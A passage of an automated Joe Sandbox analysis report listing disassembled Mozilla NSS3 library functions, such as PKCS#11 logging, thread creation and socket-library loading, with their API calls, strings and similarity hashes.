                                                                                • Opcode ID: 075800c03d6d80de8c7d038cc30433fd217773f72b34792d28d1db3481c5d2b9
                                                                                • Instruction ID: 502fecceb482ae2a997da06b639fa1960d46587e2d36a3198f1147700be67940
                                                                                • Opcode Fuzzy Hash: 075800c03d6d80de8c7d038cc30433fd217773f72b34792d28d1db3481c5d2b9
                                                                                • Instruction Fuzzy Hash: AA8102B2F042069BEF148A64DC81BAF77B5AF44318F144128E959E7781EB31E814DBA3
                                                                                Function 6CFE9C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_LoginUser), ref: 6CFE9C66
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE9C94
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE9CA3
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE9CB9
                                                                                • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CFE9CDA
                                                                                • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CFE9CF5
                                                                                • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CFE9D10
                                                                                • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CFE9D29
                                                                                • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CFE9D42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                                • API String ID: 1003633598-3838449515
                                                                                • Opcode ID: 498853e87059ce059666a0eb5c64992f5e5864ae133f3f71bfdd09b32c0b735a
                                                                                • Instruction ID: 46d120c5d22ee37860a5adb5dc1396cda12c4a8147238aa70f2ce660a56f9653
                                                                                • Opcode Fuzzy Hash: 498853e87059ce059666a0eb5c64992f5e5864ae133f3f71bfdd09b32c0b735a
                                                                                • Instruction Fuzzy Hash: EB41E2B1901215FFEB10DF55EE46F9E3BB1EB4B309F054019F91867252DBB08A14CBA2
                                                                                Function 6D0C9C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • calloc.MOZGLUE(00000001,00000080), ref: 6D0C9C70
                                                                                • PR_NewLock.NSS3 ref: 6D0C9C85
                                                                                  • Part of subcall function 6D0798D0: calloc.MOZGLUE(00000001,00000084,6CFA0936,00000001,?,6CFA102C), ref: 6D0798E5
                                                                                • PR_NewCondVar.NSS3(00000000), ref: 6D0C9C96
                                                                                  • Part of subcall function 6CF9BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CFA21BC), ref: 6CF9BB8C
                                                                                • PR_NewLock.NSS3 ref: 6D0C9CA9
                                                                                  • Part of subcall function 6D0798D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6D079946
                                                                                  • Part of subcall function 6D0798D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF316B7,00000000), ref: 6D07994E
                                                                                  • Part of subcall function 6D0798D0: free.MOZGLUE(00000000), ref: 6D07995E
                                                                                • PR_NewLock.NSS3 ref: 6D0C9CB9
                                                                                • PR_NewLock.NSS3 ref: 6D0C9CC9
                                                                                • PR_NewCondVar.NSS3(00000000), ref: 6D0C9CDA
                                                                                  • Part of subcall function 6CF9BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF9BBEB
                                                                                  • Part of subcall function 6CF9BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CF9BBFB
                                                                                  • Part of subcall function 6CF9BB80: GetLastError.KERNEL32 ref: 6CF9BC03
                                                                                  • Part of subcall function 6CF9BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CF9BC19
                                                                                  • Part of subcall function 6CF9BB80: free.MOZGLUE(00000000), ref: 6CF9BC22
                                                                                • PR_NewCondVar.NSS3(?), ref: 6D0C9CF0
                                                                                • PR_NewPollableEvent.NSS3 ref: 6D0C9D03
                                                                                  • Part of subcall function 6D0BF3B0: PR_CallOnce.NSS3(6D1114B0,6D0BF510), ref: 6D0BF3E6
                                                                                  • Part of subcall function 6D0BF3B0: PR_CreateIOLayerStub.NSS3(6D11006C), ref: 6D0BF402
                                                                                  • Part of subcall function 6D0BF3B0: PR_Malloc.NSS3(00000004), ref: 6D0BF416
                                                                                  • Part of subcall function 6D0BF3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6D0BF42D
                                                                                  • Part of subcall function 6D0BF3B0: PR_SetSocketOption.NSS3(?), ref: 6D0BF455
                                                                                  • Part of subcall function 6D0BF3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6D0BF473
                                                                                  • Part of subcall function 6D079890: TlsGetValue.KERNEL32(?,?,?,6D0797EB), ref: 6D07989E
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6D0C9D78
                                                                                • calloc.MOZGLUE(00000001,0000000C), ref: 6D0C9DAF
                                                                                • _PR_CreateThread.NSS3(00000000,6D0C9EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6D0C9D9F
                                                                                  • Part of subcall function 6CF9B3C0: TlsGetValue.KERNEL32 ref: 6CF9B403
                                                                                  • Part of subcall function 6CF9B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CF9B459
                                                                                • _PR_CreateThread.NSS3(00000000,6D0CA060,00000000,00000001,00000001,00000000,?,00000000), ref: 6D0C9DE8
                                                                                • calloc.MOZGLUE(00000001,0000000C), ref: 6D0C9DFC
                                                                                • _PR_CreateThread.NSS3(00000000,6D0CA530,00000000,00000001,00000001,00000000,?,00000000), ref: 6D0C9E29
                                                                                • calloc.MOZGLUE(00000001,0000000C), ref: 6D0C9E3D
                                                                                • _PR_MD_UNLOCK.NSS3(?), ref: 6D0C9E71
                                                                                • PR_SetError.NSS3(FFFFE890,00000000), ref: 6D0C9E89
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                • String ID:
                                                                                • API String ID: 4254102231-0
                                                                                • Opcode ID: ee98be636e4bd286bfd63656d948a164ba1fecb7b728a819ee3ffb643560e1d6
                                                                                • Instruction ID: aa53cb07fa5a3b142f913535000fd2a767eae8bd96429d20cedf5e6fc3a65f24
                                                                                • Opcode Fuzzy Hash: ee98be636e4bd286bfd63656d948a164ba1fecb7b728a819ee3ffb643560e1d6
                                                                                • Instruction Fuzzy Hash: FA616EB1900706AFE714DF75D844A6BBBF8FF09209B05453AE81AC7B51EB70E914CBA1
                                                                                Function 6CFE4CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CFE4CF3
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE4D28
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE4D37
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE4D4D
                                                                                • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CFE4D7B
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE4D8A
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE4DA0
                                                                                • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CFE4DBC
                                                                                • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CFE4E20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                • API String ID: 1003633598-3553622718
                                                                                • Opcode ID: 3f98243b1d13b80f61feeaded7a184b5ef96f4e60e846a80f56ef544a3148d32
                                                                                • Instruction ID: 56ffa0b4ef4e5811871344a43151a03a60d54d2ca161bb520ff6748b9f937704
                                                                                • Opcode Fuzzy Hash: 3f98243b1d13b80f61feeaded7a184b5ef96f4e60e846a80f56ef544a3148d32
                                                                                • Instruction Fuzzy Hash: CD410971540204FFE710DB91ED86B6E3BB5EB4630DF05402DF5186B152DBB49914CB62
                                                                                Function 6CFE7C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_Verify), ref: 6CFE7CB6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CFE7CE4
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CFE7CF3
                                                                                  • Part of subcall function 6D0CD930: PL_strncpyz.NSS3(?,?,?), ref: 6D0CD963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6CFE7D09
                                                                                • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CFE7D2A
                                                                                • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CFE7D45
                                                                                • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CFE7D5E
                                                                                • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CFE7D77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Print$L_strncpyz$L_strcatn
                                                                                • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                                • API String ID: 1003633598-3278097884
                                                                                • Opcode ID: 86bd1f63f481b5c26148ca2f02b10bea79627be55f48520d3cccf4e806739b35
                                                                                • Instruction ID: 9ca935f3ac16566f28ac975881601bd438bc9bfd79c4d334fb8d227375bf223d
                                                                                • Opcode Fuzzy Hash: 86bd1f63f481b5c26148ca2f02b10bea79627be55f48520d3cccf4e806739b35
                                                                                • Instruction Fuzzy Hash: FC31E471905205FFEB20DF55EE46F6E37B1EB4A318F09402AF518A7213DBB09914CBA2
                                                                                Function 6D07CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D07CC7B), ref: 6D07CD7A
                                                                                  • Part of subcall function 6D07CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CFEC1A8,?), ref: 6D07CE92
                                                                                • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D07CDA5
                                                                                • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D07CDB8
                                                                                • PR_UnloadLibrary.NSS3(00000000), ref: 6D07CDDB
                                                                                • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D07CD8E
                                                                                  • Part of subcall function 6CFA05C0: PR_EnterMonitor.NSS3 ref: 6CFA05D1
                                                                                  • Part of subcall function 6CFA05C0: PR_ExitMonitor.NSS3 ref: 6CFA05EA
                                                                                • PR_LoadLibrary.NSS3(wship6.dll), ref: 6D07CDE8
                                                                                • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D07CDFF
                                                                                • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D07CE16
                                                                                • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D07CE29
                                                                                • PR_UnloadLibrary.NSS3(00000000), ref: 6D07CE48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                • API String ID: 601260978-871931242
                                                                                • Opcode ID: 42ed1769c457a420e8684d21518ae1f75ee908cf3e008ac653d200fc33ea2c9f
                                                                                • Instruction ID: c432bd734c38a790e275e251d40de74a9e17863fea15f4d68a0ee96a327c1614
                                                                                • Opcode Fuzzy Hash: 42ed1769c457a420e8684d21518ae1f75ee908cf3e008ac653d200fc33ea2c9f
                                                                                • Instruction Fuzzy Hash: 8D113FA6D036226AF71186B53D01BBA7ED89B1204CF040035E81ADA741FB91C545C7EE
                                                                                Function 6D0C1C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6D0C13BC,?,?,?,6D0C1193), ref: 6D0C1C6B
                                                                                • PR_NewLock.NSS3(?,6D0C1193), ref: 6D0C1C7E
                                                                                  • Part of subcall function 6D0798D0: calloc.MOZGLUE(00000001,00000084,6CFA0936,00000001,?,6CFA102C), ref: 6D0798E5
                                                                                • PR_NewCondVar.NSS3(00000000,?,6D0C1193), ref: 6D0C1C91
                                                                                  • Part of subcall function 6CF9BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CFA21BC), ref: 6CF9BB8C
                                                                                • PR_NewCondVar.NSS3(00000000,?,?,6D0C1193), ref: 6D0C1CA7
                                                                                  • Part of subcall function 6CF9BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF9BBEB
                                                                                  • Part of subcall function 6CF9BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CF9BBFB
                                                                                  • Part of subcall function 6CF9BB80: GetLastError.KERNEL32 ref: 6CF9BC03
                                                                                  • Part of subcall function 6CF9BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CF9BC19
                                                                                  • Part of subcall function 6CF9BB80: free.MOZGLUE(00000000), ref: 6CF9BC22
                                                                                • PR_NewCondVar.NSS3(00000000,?,?,?,6D0C1193), ref: 6D0C1CBE
                                                                                • PR_NewCondVar.NSS3(00000000,?,?,?,?,6D0C1193), ref: 6D0C1CD4
                                                                                • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6D0C1193), ref: 6D0C1CFE
                                                                                • PR_Lock.NSS3(?,?,?,?,?,?,?,6D0C1193), ref: 6D0C1D1A
                                                                                  • Part of subcall function 6D079BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CFA1A48), ref: 6D079BB3
                                                                                  • Part of subcall function 6D079BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CFA1A48), ref: 6D079BC8
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6D0C1193), ref: 6D0C1D3D
                                                                                  • Part of subcall function 6D05DD70: TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                  • Part of subcall function 6D05DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • PR_SetError.NSS3(FFFFE890,00000000,?,6D0C1193), ref: 6D0C1D4E
                                                                                • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6D0C1193), ref: 6D0C1D64
                                                                                • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6D0C1193), ref: 6D0C1D6F
                                                                                • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6D0C1193), ref: 6D0C1D7B
                                                                                • PR_DestroyCondVar.NSS3(?,?,?,?,?,6D0C1193), ref: 6D0C1D87
                                                                                • PR_DestroyCondVar.NSS3(00000000,?,?,?,6D0C1193), ref: 6D0C1D93
                                                                                • PR_DestroyLock.NSS3(00000000,?,?,6D0C1193), ref: 6D0C1D9F
                                                                                • free.MOZGLUE(00000000,?,6D0C1193), ref: 6D0C1DA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                • String ID:
                                                                                • API String ID: 3246495057-0
                                                                                • Opcode ID: 720cbcfb79c526873580b7996e4ca89d7e5a7df07b19bef43b22b95fe88c3509
                                                                                • Instruction ID: d15487765d86ffa736f59d1d3f96554217fa84dbc0e5034ee36cdb0eee446476
                                                                                • Opcode Fuzzy Hash: 720cbcfb79c526873580b7996e4ca89d7e5a7df07b19bef43b22b95fe88c3509
                                                                                • Instruction Fuzzy Hash: FB31C5F1D007029BFB219F64AC41B6BB6F4AF16618F044839E94A87741FB71E514CBA3
                                                                                Function 6D02AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D02ADB1
                                                                                  • Part of subcall function 6D00BE30: SECOID_FindOID_Util.NSS3(6CFC311B,00000000,?,6CFC311B,?), ref: 6D00BE44
                                                                                • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6D02ADF4
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D02AE08
                                                                                  • Part of subcall function 6D00B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0E18D0,?), ref: 6D00B095
                                                                                • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D02AE25
                                                                                • PL_FreeArenaPool.NSS3 ref: 6D02AE63
                                                                                • PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6D02AE4D
                                                                                  • Part of subcall function 6CF34C70: TlsGetValue.KERNEL32(?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34C97
                                                                                  • Part of subcall function 6CF34C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CB0
                                                                                  • Part of subcall function 6CF34C70: PR_Unlock.NSS3(?,?,?,?,?,6CF33921,6D1114E4,6D07CC70), ref: 6CF34CC9
                                                                                • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D02AE93
                                                                                • PR_CallOnce.NSS3(6D112AA4,6D0112D0), ref: 6D02AECC
                                                                                • PL_FreeArenaPool.NSS3 ref: 6D02AEDE
                                                                                • PL_FinishArenaPool.NSS3 ref: 6D02AEE6
                                                                                • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D02AEF5
                                                                                • PL_FinishArenaPool.NSS3 ref: 6D02AF16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                • String ID: security
                                                                                • API String ID: 3441714441-3315324353
                                                                                • Opcode ID: ef0082dfc24d2bef9084aba52ffc8772d1e757cb9e884d92ad2c19faba212a23
                                                                                • Instruction ID: 201ae6a41198b53fcaa769a012a9d40516b08178622667afd808fb6fdbe2d005
                                                                                • Opcode Fuzzy Hash: ef0082dfc24d2bef9084aba52ffc8772d1e757cb9e884d92ad2c19faba212a23
                                                                                • Instruction Fuzzy Hash: 414135B180931167FB215B68AC85F7E72E8BF4272CF600425EA1493281FF399605CAE3
                                                                                Function 6CFC8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,?), ref: 6CFC8E22
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CFC8E36
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8E4F
                                                                                • calloc.MOZGLUE(00000001,?,?,?), ref: 6CFC8E78
                                                                                • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CFC8E9B
                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CFC8EAC
                                                                                • PL_ArenaAllocate.NSS3(?,?), ref: 6CFC8EDE
                                                                                • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CFC8EF0
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8F00
                                                                                • free.MOZGLUE(?), ref: 6CFC8F0E
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CFC8F39
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8F4A
                                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6CFC8F5B
                                                                                • PR_Unlock.NSS3(?), ref: 6CFC8F72
                                                                                • PR_Unlock.NSS3(?), ref: 6CFC8F82
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                • String ID:
                                                                                • API String ID: 1569127702-0
                                                                                • Opcode ID: a2bf5a5e4062298121592b0605a57bb808c47bce217cb21f9fe1ee44537ed216
                                                                                • Instruction ID: efbf4a0ab38d27a078830cd8c5c4c14caad25fd3177ecc5ab6d56ae1c1c14684
                                                                                • Opcode Fuzzy Hash: a2bf5a5e4062298121592b0605a57bb808c47bce217cb21f9fe1ee44537ed216
                                                                                • Instruction Fuzzy Hash: A051B4B2F002169FE7009F68CC85A6FB7B9EF45758B15452AEC089B600E731ED45C7E2
                                                                                Function 6CF3DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,?,?), ref: 6CF3DD56
                                                                                • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6CF3DD7C
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CF3DE67
